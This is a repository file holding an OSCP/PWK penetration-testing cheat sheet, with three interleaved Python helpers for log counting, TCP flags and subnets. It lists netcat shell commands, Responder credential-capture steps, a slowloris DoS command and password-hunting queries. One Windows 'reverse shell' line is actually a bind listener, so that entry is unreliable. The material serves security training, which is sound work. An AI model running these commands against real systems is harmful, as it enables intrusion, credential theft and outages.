├── README.md
└── oscp_human_guide.md
/README.md:
--------------------------------------------------------------------------------
1 | # Old OSCP
2 | OSCP cheatsheet by https://github.com/ibr2
3 |
4 |
5 | # PWK-CheatSheet
6 |
7 |
8 |
9 | (ASCII-art banner, garbled in extraction)
19 |
20 | #### Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet
21 |
22 | ## Table of Contents
23 | - [Linux 101](#linux-101)
24 | - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
25 | * [Passive Information Gathering](#passive-information-gathering)
26 | * [Active Information Gathering](#active-information-gathering)
27 | * [Port Scanning](#port-scanning)
28 | * [Enumeration](#enumeration)
29 | * [HTTP Enumeration](#http-enumeration)
30 | - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
31 | - [Shells](#shells)
32 | - [File Transfers](#file-transfers)
33 | - [Privilege Escalation](#privilege-escalation)
34 | * [Linux Privilege Escalation](#linux-privilege-escalation)
35 | * [Windows Privilege Escalation](#windows-privilege-escalation)
36 | - [Client, Web and Password Attacks](#client-web-and-password-attacks)
37 | * [Client Attacks](#client-attacks)
38 | * [Web Attacks](#web-attacks)
39 | * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
40 | * [Database Vulnerabilities](#database-vulnerabilities)
41 | * [Password Attacks](#password-attacks)
42 | * [Password Hash Attacks](#password-hash-attacks)
43 | - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
44 | - [The Metasploit Framework](#the-metasploit-framework)
45 | - [Bypassing Antivirus Software](#bypassing-antivirus-software)
46 |
47 | Linux 101
48 | ===============================================================================================================================
49 | # Set the Target IP Address to the $ip system variable
50 | ```shell
51 | $ export ip=192.168.1.100
52 | ```
53 | # Find the location of a file
54 | ```shell
55 | $ locate sbd.exe
56 | ```
57 | # Search through directories in the $PATH environment variable
58 | ```shell
59 | $ which sbd
60 | ```
61 | # Find a file whose name contains a specific string
62 | ```shell
63 | $ find / -name sbd\*
64 | ```
65 | # Show active internet connections
66 | ```shell
67 | $ netstat -lntp
68 | ```
69 | # Change Password
70 | ```shell
71 | $ passwd
72 | ```
73 | # Verify a service is running and listening
74 | ```shell
75 | $ netstat -antp |grep apache
76 | ```
77 | # Start a service
78 | ```shell
79 | $ systemctl start ssh
80 | $ systemctl start apache2
81 | ```
82 | # Unzip a gz file
83 | ```shell
84 | $ gunzip access.log.gz
85 | ```
86 | # Unzip a tar.gz file
87 | ```shell
88 | $ tar -xzvf file.tar.gz
89 | ```
90 | - Search command history
91 | ```shell
92 | history | grep phrase_to_search_for
93 | ```
94 |
95 | - Have a service start at boot
96 | ```shell
97 | systemctl enable ssh
98 | ```
99 | - Stop a service
100 | `systemctl stop ssh`
101 |
102 | - Download a webpage
103 | `wget http://www.cisco.com`
104 |
105 | - Open a webpage
106 | `curl http://www.cisco.com`
107 |
108 | - String manipulation
109 |
110 | - Count number of lines in file
111 | `wc index.html`
112 |
113 | - Get the start or end of a file
114 | `head index.html `
115 | `tail index.html`
116 |
117 | - Extract all the lines that contain a string
118 | `grep "href=" index.html`
119 |
120 | - Cut a string by a delimiter, filter results, then sort
121 | `grep "href=" index.html | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u`
122 |
123 | - Use grep with a regular expression and write the output to a file
124 | `grep -o 'http://[^"]*' index.html | cut -d "/" -f 3 | sort -u > list.txt`
125 |
126 | - Use a bash loop to find the IP address behind each host
127 | `for url in $(cat list.txt); do host $url; done`
128 |
129 | - Collect all the IP addresses from a log file and sort them by frequency (`sort -urn` would drop every IP that shares a count with another one, so use `-rn`)
131 | `cut -d " " -f 1 access.log | sort | uniq -c | sort -rn`
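
The `cut | sort | uniq -c | sort -rn` pipeline is the shell way to rank clients in an access log. As an added example that is not part of the original cheat sheet, the Python below does the same count, but validates the first field as an IP address (so a malformed line does not pollute the counts) and flags clients above a request threshold, which is the usual first triage step when hunting for a scanner or brute-force source in a web log. The log lines are constructed samples, not real traffic; the function names are this example's own.

```python
import ipaddress
from collections import Counter

# Constructed sample of Apache/nginx-style access log lines (not real traffic).
# One line is deliberately malformed to show it is skipped rather than counted.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326
192.168.1.20 - - [10/Oct/2023:13:55:37 +0000] "GET /login HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "POST /login HTTP/1.1" 401 128
172.16.3.9 - - [10/Oct/2023:13:55:39 +0000] "GET /robots.txt HTTP/1.1" 404 209
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "POST /login HTTP/1.1" 401 128
not-a-log-line
192.168.1.20 - - [10/Oct/2023:13:55:41 +0000] "GET /about HTTP/1.1" 200 1024
"""


def client_ip_counts(log_text):
    """Count requests per client IP, i.e. the first space-separated field,
    like `cut -d " " -f 1 access.log | sort | uniq -c`.
    Lines whose first field is not a valid IPv4/IPv6 address are skipped."""
    counts = Counter()
    for line in log_text.splitlines():
        fields = line.split(" ", 1)
        if not fields or not fields[0]:
            continue
        try:
            ip = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue  # malformed line, not an IP in column 1
        counts[ip] += 1
    return counts


def top_client_ips(log_text):
    """Rank clients by request count, highest first (the `sort -rn` step).
    Ties are broken by the IP string so the output is deterministic.
    Returns a list of (count, ip) tuples, the same shape `uniq -c` prints."""
    counts = client_ip_counts(log_text)
    return sorted(((n, ip) for ip, n in counts.items()), key=lambda t: (-t[0], t[1]))


def noisy_clients(log_text, threshold):
    """IPs that made more than `threshold` requests: a crude but useful cut
    for spotting scanners or login brute-forcing in a log."""
    return [ip for n, ip in top_client_ips(log_text) if n > threshold]


if __name__ == "__main__":
    for count, ip in top_client_ips(SAMPLE_ACCESS_LOG):
        print(f"{count:>7} {ip}")
    print("above threshold:", noisy_clients(SAMPLE_ACCESS_LOG, 2))
```

On a real log you would read the file instead of the embedded string; the parsing is deliberately limited to column 1 so it works on both common and combined log formats.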
132 |
133 | - Netcat - Read and write TCP and UDP Packets
134 |
135 | - Connect to a POP3 mail server
136 | `nc -nv $ip 110`
137 |
138 | - Listen on TCP/UDP port
139 | `nc -nlvp 4444`
140 |
141 | - Connect to a netcat port
142 | `nc -nv $ip 4444`
143 |
144 | - Send a file using netcat
145 | `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
146 |
147 | - Receive a file using netcat
148 | `nc -nlvp 4444 > incoming.exe`
149 |
150 | - Create a reverse shell with Ncat using cmd.exe on Windows
151 | `nc -nlvp 4444 -e cmd.exe`
152 |
153 | - Create a reverse shell with Ncat using bash on Linux
154 | `nc -nv $ip 4444 -e /bin/bash`
155 |
156 | - Ncat - Netcat from the Nmap project; it adds features such as SSL and connection allow lists, which help avoid IDS
158 |
159 | - Reverse shell from Windows using cmd.exe over SSL
160 | `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
161 |
162 | - Listen on port 4444 using SSL
163 | `ncat -v $ip 4444 --ssl`
164 |
165 | - Wireshark
166 | - Show only SMTP (port 25) and ICMP traffic:
167 | `tcp.port eq 25 or icmp`
168 |
169 | - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
170 | `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
171 |
172 | - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
173 | `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
174 |
175 | - Some filters are equivalent
176 | `ip.addr == 10.43.54.65`
177 | equals
178 | `ip.src == 10.43.54.65 or ip.dst == 10.43.54.65`
179 |
180 | `ip.addr != 10.43.54.65`
181 | equals
182 | `ip.src != 10.43.54.65 or ip.dst != 10.43.54.65`
183 |
184 | - Tcpdump
185 |
186 | - Display a pcap file
187 | `tcpdump -r password_cracking_filtered.pcap`
188 |
189 | - Display IPs, then filter and sort them
190 | `tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort -u | head`
191 |
192 | - Grab a packet capture on port 80
193 | `tcpdump tcp port 80 -w output.pcap -i eth0`
194 |
195 | - Check for ACK or PSH flag set in a TCP packet
196 | `tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap`
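
`tcp[13]` is the TCP flags byte, and 24 is 0x18 = PSH (8) + ACK (16), so the filter above matches segments with exactly those two flags set and nothing else. As an added example that is not part of the original cheat sheet, the Python below decodes and encodes that byte, builds the equivalent tcpdump expressions (exact match versus "at least these flags"), and reads the flags out of a constructed 20-byte TCP header. The header bytes and all function names are this example's own.

```python
import struct

# Bit layout of the TCP flags byte (byte 13 of the TCP header), per RFC 793/3168.
TCP_FLAG_BITS = {
    "FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
    "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80,
}


def decode_tcp_flags(byte):
    """Set of flag names in a tcp[13] value, e.g. 24 -> {'PSH', 'ACK'}."""
    if not 0 <= byte <= 0xFF:
        raise ValueError("tcp[13] is a single byte")
    return {name for name, bit in TCP_FLAG_BITS.items() if byte & bit}


def encode_tcp_flags(names):
    """Inverse of decode_tcp_flags; unknown names raise KeyError on purpose."""
    value = 0
    for name in names:
        value |= TCP_FLAG_BITS[name]
    return value


def tcpdump_flag_filter(names, exact=True):
    """BPF expression for the given flags.
    exact=True  -> 'tcp[13] = N'      : flags are exactly these (the cheat sheet form)
    exact=False -> 'tcp[13] & N = N'  : at least these flags, whatever else is set
    (e.g. PSH+ACK segments that also carry URG are missed by the exact form)."""
    value = encode_tcp_flags(names)
    return f"tcp[13] = {value}" if exact else f"tcp[13] & {value} = {value}"


def flags_from_tcp_header(header):
    """Decode the flags byte from a raw TCP header (bytes)."""
    if len(header) < 14:
        raise ValueError("TCP header too short to contain the flags byte")
    return decode_tcp_flags(header[13])


# Constructed 20-byte TCP header: sport 443, dport 51234, seq 1, ack 1,
# data offset 5 (no options), flags 0x18 (PSH+ACK), window 65535, csum 0, urg 0.
SAMPLE_TCP_HEADER = struct.pack("!HHIIBBHHH", 443, 51234, 1, 1, 5 << 4, 0x18, 65535, 0, 0)


if __name__ == "__main__":
    print(sorted(decode_tcp_flags(24)))                      # ['ACK', 'PSH']
    print(tcpdump_flag_filter(["PSH", "ACK"]))                # tcp[13] = 24
    print(tcpdump_flag_filter(["SYN"], exact=False))          # tcp[13] & 2 = 2
    print(sorted(flags_from_tcp_header(SAMPLE_TCP_HEADER)))   # ['ACK', 'PSH']
```

tcpdump also accepts the symbolic form, e.g. `tcp[tcpflags] & (tcp-push|tcp-ack) == (tcp-push|tcp-ack)`, which is easier to read in a saved filter than the raw byte value; the numeric form above is what the cheat sheet uses and is what the symbolic names expand to.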
197 |
198 | - IPTables deny traffic to ports except for Local Loopback
199 | ```shell
200 | iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP
201 | iptables -A INPUT -p tcp --destination-port 4444 ! -d $ip -j DROP
202 | ```
203 | Information Gathering & Vulnerability Scanning
204 | ===============================================================================================================================
205 |
206 | - Passive Information Gathering
207 | ---------------------------------------------------------------------------------------------------------------------------
208 |
209 | - Google Hacking
210 |
211 | - Google search to find website sub domains
212 | `site:microsoft.com`
213 | `site:www.microsoft.com`
214 |
215 | - Google filetype, and intitle
216 | `intitle:"netbotz appliance" "OK" -filetype:pdf`
217 |
218 | - Google inurl
219 | `inurl:"level/15/sexec/-/show"`
220 |
221 | - Google Hacking Database:
222 | https://www.exploit-db.com/google-hacking-database/
223 |
224 | - SSL Certificate Testing
225 | [*https://www.ssllabs.com/ssltest/analyze.html*](https://www.ssllabs.com/ssltest/analyze.html)
226 |
227 | - Email Harvesting
228 |
229 | - Simply Email
230 | `git clone https://github.com/killswitch-GUI/SimplyEmail.git `
231 | `./SimplyEmail.py -all -e TARGET-DOMAIN`
232 |
233 | - Netcraft
234 |
235 | - Determine the operating system and tools used to build a site
236 | https://searchdns.netcraft.com/
237 |
238 | - Whois Enumeration
239 | `whois domain-name-here.com `
240 | `whois $ip`
241 |
242 | - Banner Grabbing
243 |
244 | - `nc -v $ip 25`
245 |
246 | - `telnet $ip 25`
247 |
248 | - `nc TARGET-IP 80`
249 |
250 | - Recon-ng - full-featured web reconnaissance framework written in Python
251 |
252 | - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
253 | `cd /opt/recon-ng `
254 | `./recon-ng `
255 | `show modules `
256 | `help`
257 |
258 | - Active Information Gathering
259 | --------------------------------------------------------------------------------------------------------------------------
260 |
261 |
262 |
263 | - DNS Enumeration
264 |
265 | - Host Lookup
266 | `host -t ns megacorpone.com`
267 |
268 | - Reverse Lookup Brute Force - find domains in the same range
269 | `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
270 |
271 | - Perform DNS IP Lookup
272 | `dig a domain-name-here.com @nameserver`
273 |
274 | - Perform MX Record Lookup
275 | `dig mx domain-name-here.com @nameserver`
276 |
277 | - Perform Zone Transfer with DIG
278 | `dig axfr domain-name-here.com @nameserver`
279 |
280 | - DNS Zone Transfers
281 | Windows DNS zone transfer
282 | `nslookup -> set type=any -> ls -d blah.com `
283 | Linux DNS zone transfer
284 | `dig axfr blah.com @ns1.blah.com`
285 |
286 | - Dnsrecon DNS Brute Force
287 | `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml`
288 |
289 | - Dnsrecon DNS List of megacorp
290 | `dnsrecon -d megacorpone.com -t axfr`
291 |
292 | - DNSEnum
293 | `dnsenum zonetransfer.me`
294 |
295 | - Port Scanning
296 | -----------------------------------------------------------------------------------------------------------
297 | *Subnet Reference Table*
298 |
299 | / | Addresses | Hosts | Netmask | Amount of a Class C
300 | --- | --- | --- | --- | ---
301 | /30 | 4 | 2 | 255.255.255.252| 1/64
302 | /29 | 8 | 6 | 255.255.255.248 | 1/32
303 | /28 | 16 | 14 | 255.255.255.240 | 1/16
304 | /27 | 32 | 30 | 255.255.255.224 | 1/8
305 | /26 | 64 | 62 | 255.255.255.192 | 1/4
306 | /25 | 128 | 126 | 255.255.255.128 | 1/2
307 | /24 | 256 | 254 | 255.255.255.0 | 1
308 | /23 | 512 | 510 | 255.255.254.0 | 2
309 | /22 | 1024 | 1022 | 255.255.252.0 | 4
310 | /21 | 2048 | 2046 | 255.255.248.0 | 8
311 | /20 | 4096 | 4094 | 255.255.240.0 | 16
312 | /19 | 8192 | 8190 | 255.255.224.0 | 32
313 | /18 | 16384 | 16382 | 255.255.192.0 | 64
314 | /17 | 32768 | 32766 | 255.255.128.0 | 128
315 | /16 | 65536 | 65534 | 255.255.0.0 | 256
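
The table above gives one row per prefix length. As an added example that is not from the original cheat sheet, the Python below computes any row from the prefix length, cross-checks the netmask with the standard-library `ipaddress` module, and converts a CIDR block into its first/last usable host and into the `a.b.c.x-y` target form that the nmap commands in this section use (e.g. `$ip-254`). It goes slightly beyond the table by handling /31 and /32, which reserve no network or broadcast address. Function names are this example's own.

```python
from fractions import Fraction
import ipaddress


def subnet_row(prefix):
    """One row of the subnet table for an IPv4 prefix length:
    (addresses, usable hosts, dotted netmask, fraction of a /24)."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix length must be between 0 and 32")
    addresses = 2 ** (32 - prefix)
    # /30 and larger lose the network and broadcast address; /31 (RFC 3021
    # point-to-point links) and /32 (a single host) reserve nothing.
    hosts = addresses - 2 if prefix <= 30 else addresses
    # Let ipaddress derive the mask rather than hand-building the bit pattern.
    netmask = str(ipaddress.ip_network(f"0.0.0.0/{prefix}").netmask)
    class_c_fraction = Fraction(addresses, 256)
    return addresses, hosts, netmask, class_c_fraction


def subnet_table(start=30, stop=16):
    """The cheat sheet's table, /30 down to /16, as (prefix, addresses, hosts, netmask, fraction) rows."""
    return [(f"/{p}",) + subnet_row(p) for p in range(start, stop - 1, -1)]


def usable_host_range(cidr):
    """First and last host address in a block, e.g. 192.168.1.0/24 -> 192.168.1.1 .. 192.168.1.254.
    strict=False accepts a host address (192.168.1.37/24) as well as the network address."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen >= 31:
        return str(net[0]), str(net[-1])  # every address is usable
    hosts = list(net.hosts())
    return str(hosts[0]), str(hosts[-1])


def nmap_range(cidr):
    """Usable hosts as an nmap target spec: 'a.b.c.x-y' when the block fits inside one /24
    (the '$ip-254' style used in this section), plain CIDR otherwise."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen < 24 or net.prefixlen > 30:
        return str(net)
    first, last = usable_host_range(cidr)
    return f"{first}-{last.rsplit('.', 1)[1]}"


if __name__ == "__main__":
    for row in subnet_table():
        print("{:>4} | {:>6} | {:>6} | {:<15} | {}".format(*row))
    print(usable_host_range("192.168.1.0/24"), nmap_range("192.168.1.128/25"))
```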
316 |
317 | - Set the IP address as a variable
318 | `export ip=192.168.1.100 `
319 | `nmap -A -T4 -p- $ip`
320 |
321 | - Netcat port Scanning
322 | `nc -nvv -w 1 -z $ip 3388-3390`
323 |
324 | - Discover who else is on the network
325 | `netdiscover`
326 |
327 | - Discover IP Mac and Mac vendors from ARP
328 | `netdiscover -r $ip/24`
329 |
330 | - Nmap stealth scan using SYN
331 | `nmap -sS $ip`
332 |
333 | - Nmap stealth scan using FIN
334 | `nmap -sF $ip`
335 |
336 | - Nmap Banner Grabbing
337 | `nmap -sV -sT $ip`
338 |
339 | - Nmap OS Fingerprinting
340 | `nmap -O $ip`
341 |
342 | - Nmap Regular Scan:
343 | `nmap $ip/24`
344 |
345 | - Enumeration Scan
346 | `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
347 |
348 | - Enumeration Scan All Ports TCP / UDP and output to a txt file
349 | `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
350 |
351 | - Nmap output to a file:
352 | `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
353 |
354 | - Quick Scan:
355 | `nmap -T4 -F $ip/24`
356 |
357 | - Quick Scan Plus:
358 | `nmap -sV -T4 -O -F --version-light $ip/24`
359 |
360 | - Quick traceroute
361 | `nmap -sn --traceroute $ip`
362 |
363 | - All TCP and UDP Ports
364 | `nmap -v -sU -sS -p- -A -T4 $ip`
365 |
366 | - Intense Scan:
367 | `nmap -T4 -A -v $ip`
368 |
369 | - Intense Scan Plus UDP
370 | `nmap -sS -sU -T4 -A -v $ip/24`
371 |
372 | - Intense Scan ALL TCP Ports
373 | `nmap -p 1-65535 -T4 -A -v $ip/24`
374 |
375 | - Intense Scan - No Ping
376 | `nmap -T4 -A -v -Pn $ip/24`
377 |
378 | - Ping scan
379 | `nmap -sn $ip/24`
380 |
381 | - Slow Comprehensive Scan
382 | `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
383 |
384 | - Scan with Active connect in order to weed out any spoofed ports designed to troll you
385 | `nmap -p1-65535 -A -T5 -sT $ip`
386 |
387 | - Enumeration
388 | -----------
389 |
390 | - NMap Enumeration Script List:
391 |
392 | - NMap Discovery
393 | [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
394 |
395 | - Nmap port version detection MAXIMUM power
396 | `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
397 |
399 |
400 | - SMB Enumeration
401 |
402 | - SMB OS Discovery
403 | `nmap $ip --script smb-os-discovery.nse`
404 |
405 | - Nmap port scan
406 | `nmap -v -p 139,445 -oG smb.txt $ip-254`
407 |
408 | - Netbios Information Scanning
409 | `nbtscan -r $ip/24`
410 |
411 | - Nmap find exposed Netbios servers
412 | `nmap -sU --script nbstat.nse -p 137 $ip`
413 |
414 | - SMB Enumeration Tools
415 | `nmblookup -A $ip `
416 | `smbclient //MOUNT/share -I $ip -N `
417 | `rpcclient -U "" $ip `
418 | `enum4linux $ip `
419 | `enum4linux -a $ip`
420 |
421 | - SMB Finger Printing
422 | `smbclient -L //$ip`
423 |
424 | - Nmap Scan for Open SMB Shares
425 | `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip/24`
426 |
427 | - Nmap scans for vulnerable SMB Servers
428 | `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
429 |
430 | - Nmap List all SMB scripts installed
431 | `ls -l /usr/share/nmap/scripts/smb*`
432 |
433 | - Enumerate SMB Users
434 |
435 | - `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
436 |
437 | - `python /usr/share/doc/python-impacket-doc/examples/samrdump.py $ip`
438 |
439 | - RID Cycling - Null Sessions
440 | [*https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/*](https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/)
441 |
442 | - `ridenum.py $ip 500 50000 dict.txt`
443 |
444 | - `use auxiliary/scanner/smb/smb_lookupsid`
445 |
446 | - Manual Null Session Testing
447 |
448 | - Windows: `net use \\$ip\IPC$ "" /u:""`
449 |
450 | - Linux: `smbclient -L //$ip`
451 |
452 | - LLMNR / NBT-NS Spoofing - Steal credentials off the network.
453 |
454 | - Spoof / poison LLMNR / NetBIOS requests:
455 | auxiliary/spoof/llmnr/llmnr_response
456 | auxiliary/spoof/nbns/nbns_response
457 |
458 | - Capture the hashes:
459 | auxiliary/server/capture/smb
460 | auxiliary/server/capture/http_ntlm
461 |
462 | - Using Responder to Steal Creds
463 | `git clone https://github.com/SpiderLabs/Responder.git `
464 | `python Responder.py -i local-ip -I eth0`
465 |
466 | - SMTP Enumeration - Mail Servers
467 |
468 | - Verify SMTP port using Netcat
469 | `nc -nv $ip 25`
470 |
471 | - SNMP Enumeration -Simple Network Management Protocol
472 |
473 | - Fix SNMP output values so they are human readable
474 | `apt-get install snmp-mibs-downloader && download-mibs`
475 | `echo "" > /etc/snmp/snmp.conf`
476 |
477 | - SNMP Enumeration Commands
478 |
479 | - `snmpcheck -t $ip -c public`
480 |
481 | - `snmpwalk -c public -v1 $ip 1 | grep hrSWRunName | cut -d " " -f 4`
484 |
485 | - `snmpenum -t $ip`
486 |
487 | - `onesixtyone -c names -i hosts`
488 |
489 | - SNMPv3 Enumeration
490 | `nmap -sV -p 161 --script=snmp-info $ip/24`
491 |
492 | - Automate the username enumeration process for SNMPv3:
493 | `apt-get install snmp snmp-mibs-downloader `
494 | `wget `
495 |
496 | - SNMP Default Credentials
497 | /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
498 |
499 | - Linux OS Enumeration
500 |
501 | - List all SUID files
502 | `find / -perm -4000 2>/dev/null`
503 |
504 | - Determine the current version of Linux
505 | `cat /etc/issue`
506 |
507 | - Determine more information about the environment
508 | `uname -a`
509 |
510 | - List processes running
511 | `ps -xaf`
512 |
513 | - List the allowed (and forbidden) commands for the invoking user
514 | `sudo -l`
515 |
516 | - List iptables rules
517 | ```shell
518 | iptables --table nat --list
519 | iptables -vL -t filter
520 | iptables -vL -t nat
521 | iptables -vL -t mangle
522 | iptables -vL -t raw
523 | iptables -vL -t security
524 | ```
523 |
524 | - Windows OS Enumeration
525 |
526 |
527 | - net config Workstation
528 |
529 | - systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
530 |
531 | - hostname
532 |
533 | - net users
534 |
535 | - ipconfig /all
536 |
537 | - route print
538 |
539 | - arp -A
540 |
541 | - netstat -ano
542 |
543 | - netsh firewall show state
544 |
545 | - netsh firewall show config
546 |
547 | - schtasks /query /fo LIST /v
548 |
549 | - tasklist /SVC
550 |
551 | - net start
552 |
553 | - DRIVERQUERY
554 |
555 | - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
556 |
557 | - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
558 |
559 | - `dir /s *pass* == *cred* == *vnc* == *.config*`
560 |
561 | - findstr /si password *.xml *.ini *.txt
562 |
563 | - reg query HKLM /f password /t REG_SZ /s
564 |
565 | - reg query HKCU /f password /t REG_SZ /s
566 |
567 | - Vulnerability Scanning with Nmap
568 |
569 | - Nmap Exploit Scripts
570 | [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
571 |
572 | - Nmap search through vulnerability scripts
573 | ```shell
574 | cd /usr/share/nmap/scripts/
575 | ls -l *vuln*
576 | ```
575 |
576 | - Nmap search through Nmap Scripts for a specific keyword
577 | `ls /usr/share/nmap/scripts/* | grep ftp`
578 |
579 | - Scan for vulnerable exploits with nmap
580 | `nmap --script exploit -Pn $ip`
581 |
582 | - NMap Auth Scripts
583 | [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
584 |
585 | - Nmap Vuln Scanning
586 | [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
587 |
588 | - NMap DOS Scanning
589 | `nmap --script dos -Pn $ip`
590 |
591 | - NMap Execute DOS Attack
592 | `nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true`
593 |
594 | - Scan for coldfusion web vulnerabilities
595 | `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
596 |
597 | - Anonymous FTP dump with Nmap
598 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
599 |
600 | - SMB Security mode scan with Nmap
601 | `nmap -v -p 445 --script=smb-security-mode $ip-254`
602 |
603 | - File Enumeration
604 |
605 | - Find UID 0 files root execution
606 |
607 | - `/usr/bin/find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null`
608 |
609 | - Get handy linux file system enumeration script (/var/tmp)
610 | `wget `
611 | `chmod +x ./linux-local-enum.sh `
612 | `./linux-local-enum.sh`
613 |
614 | - Find executable files updated in August
615 | `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
616 |
617 | - Find a specific file on linux
618 | `find /. -name suid*`
619 |
620 | - Find all the strings in a file
621 | `strings <filename>`
622 |
623 | - Determine the type of a file
624 | `file <filename>`
625 |
626 | - HTTP Enumeration
627 | ----------------
628 |
629 | - Search for folders with gobuster:
630 | `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
631 |
632 | - OWASP DirBuster - HTTP folder enumeration - can take a dictionary file
633 |
634 | - Dirb - Directory brute force finding using a dictionary file
635 | `dirb http://$ip/ wordlist.dict `
636 | `dirb `
637 |
638 | Dirb against a proxy
639 |
640 | - `dirb http://$ip/ -p $ip:3129`
641 |
642 | - Nikto
643 | `nikto -h $ip`
644 |
645 | - HTTP Enumeration with NMAP
646 | `nmap --script=http-enum -p80 -n $ip/24`
647 |
648 | - Nmap Check the server methods
649 | `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
650 |
651 | - Get Options available from web server
652 | `curl -vX OPTIONS vm/test`
653 |
654 | - Uniscan directory finder:
655 | `uniscan -qweds -u `
656 |
657 | - Wfuzz - The web brute forcer
658 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
659 | `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
660 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
661 |
662 |
663 |
664 | - Open a service using a port knock (secured with knockd)
665 | ```shell
666 | for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x server_ip_address; done
667 | ```
667 |
668 | - WordPress Scan - Wordpress security scanner
669 |
670 | - wpscan --url $ip/blog --proxy $ip:3129
671 |
672 | - RSH Enumeration - Unencrypted file transfer system
673 |
674 | - auxiliary/scanner/rservices/rsh\_login
675 |
676 | - Finger Enumeration
677 |
678 | - finger @$ip
679 |
680 | - finger batman@$ip
681 |
682 | - TLS & SSL Testing
683 |
684 | - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html
686 |
687 | - Proxy Enumeration (useful for open proxies)
688 |
689 | - nikto -useproxy http://$ip:3128 -h $ip
690 |
691 | - Steganography
692 |
693 | > apt-get install steghide
694 | >
695 | > steghide extract -sf picture.jpg
696 | >
697 | > steghide info picture.jpg
698 | >
699 | > apt-get install stegosuite
700 |
701 | - The OpenVAS Vulnerability Scanner
702 |
703 | - apt-get update && apt-get install openvas && openvas-setup
706 |
707 | - netstat -tulpn
708 |
709 | - Login at:
710 | https://$ip:9392
711 |
712 | Buffer Overflows and Exploits
713 | ===================================================================================================================================
714 |
715 | - DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
717 |
718 | - MSFvenom
719 | [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
720 |
721 | - Windows Buffer Overflows
722 |
723 | - Controlling EIP
724 |
725 | - locate pattern_create
726 |
727 | - pattern_create.rb -l 2700
728 |
729 | - locate pattern_offset
730 |
731 | - pattern_offset.rb -q 39694438
732 |
733 | - Verify exact location of EIP - [*] Exact match at offset 2606
734 |
735 | - buffer = "A" * 2606 + "B" * 4 + "C" * 90
736 |
737 | - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
738 |
739 | - Use Mona to determine a module that is unprotected
740 |
741 | - Bypass DEP if present by finding a memory location with Read and Execute access for JMP ESP
743 |
744 | - Otherwise without DEP, we can stick our
745 |
